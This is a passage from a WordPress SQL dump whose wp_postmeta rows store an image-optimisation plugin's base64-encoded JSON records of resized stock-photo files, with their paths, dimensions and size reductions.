kXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDYxOTc3LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4MzA0LCJpZCI6MjYwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQ2MTk3Ny0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQ2MTk3Ny0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQ2MTk3Ny0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODMwNywiaWQiOjI2MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMDksImlkIjoyNjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMTIsImlkIjoyNjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMTQsImlkIjoyNjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMTcsImlkIjoyNjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMjAsImlkIjoyNjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMjIsImlkIjoyNjB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0NjE5NzctNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMjUsImlkIjoyNjB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30269, 259, 'wpfc_optimisation_reduction', '132422'); 
INSERT INTO `wp_postmeta` VALUES (30270, 259, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LmpwZyIsIndpZHRoIjozMDAwLCJoZWlnaHQiOjIwMDAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUuanBnIiwicmVkdWN0aW9uIjoxMzI0MDgsInRpbWUiOjE0ODM1ODgzMzYsImlkIjoiMjU5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzMzksImlkIjoyNTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4MzQyLCJpZCI6MjU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQzNTkzNS03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQzNTkzNS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQzNTkzNS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODM0NSwiaWQiOjI1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODM0OSwiaWQiOjI1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzNTEsImlkIjoyNTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI1NDM1OTM1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTg4MzUzLCJpZCI6MjU5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQzNTkzNS0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQzNTkzNS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNTQzNTkzNS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODM1NiwiaWQiOjI1OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzNTksImlkIjoyNTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzNjEsImlkIjoyNTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzNjMsImlkIjoyNTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMjQ3eDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzNjYsImlkIjoyNTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzNjgsImlkIjoyNTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzNzEsImlkIjoyNTl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNjAweDYwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjU0MzU5MzUtNjAweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1ODgzNzQsImlkIjoyNTl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (30271, 258, 'wpfc_optimisation_reduction', '36590'); 
INSERT INTO `wp_postmeta` VALUES (30272, 258, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI0OTg2MTI5LmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvY2Fuc3RvY2twaG90bzI0OTg2MTI5LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEyMTgsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9jYW5zdG9ja3Bob3RvMjQ5ODYxMjkuanBnIiwicmVkdWN0aW9uIjozNjU3NiwidGltZSI6MTQ4MzU4ODM4MywiaWQiOiIyNTgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNDk4NjEyOS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNDk4NjEyOS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL2NhbnN0b2NrcGhvdG8yNDk4NjEyOS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU4ODM4NSwiaWQiOjI1OH0seyJmaWxlIjoiXC9ob21lXC9ub3R